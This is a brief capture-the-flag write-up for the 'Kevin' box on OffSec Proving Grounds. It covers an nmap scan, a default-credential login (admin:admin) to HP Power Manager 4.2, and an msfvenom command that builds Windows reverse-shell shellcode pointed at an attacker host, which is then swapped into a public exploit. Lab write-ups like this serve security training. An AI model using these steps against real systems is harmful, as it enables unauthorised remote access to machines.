Kevin

Writeup for Kevin from OffSec Proving Grounds.

Information Gathering

sudo ./nmapAutomator.sh 192.168.218.45 all

Service Enumeration

HTTP (Port 80)

Port 80 serves HP Power Manager. We can authenticate easily using admin:admin.

We can see here that this is running HP Power Manager 4.2.

*** Take note: The target IP above and below may differ as I finished this box on another day. ***

Exploit

There is an exploit for this.

Generating shellcode:

msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=192.168.49.70 LPORT=80 -e x86/alpha_mixed -f c

We then replace the shellcode in the script with our generated shellcode and run the exploit.
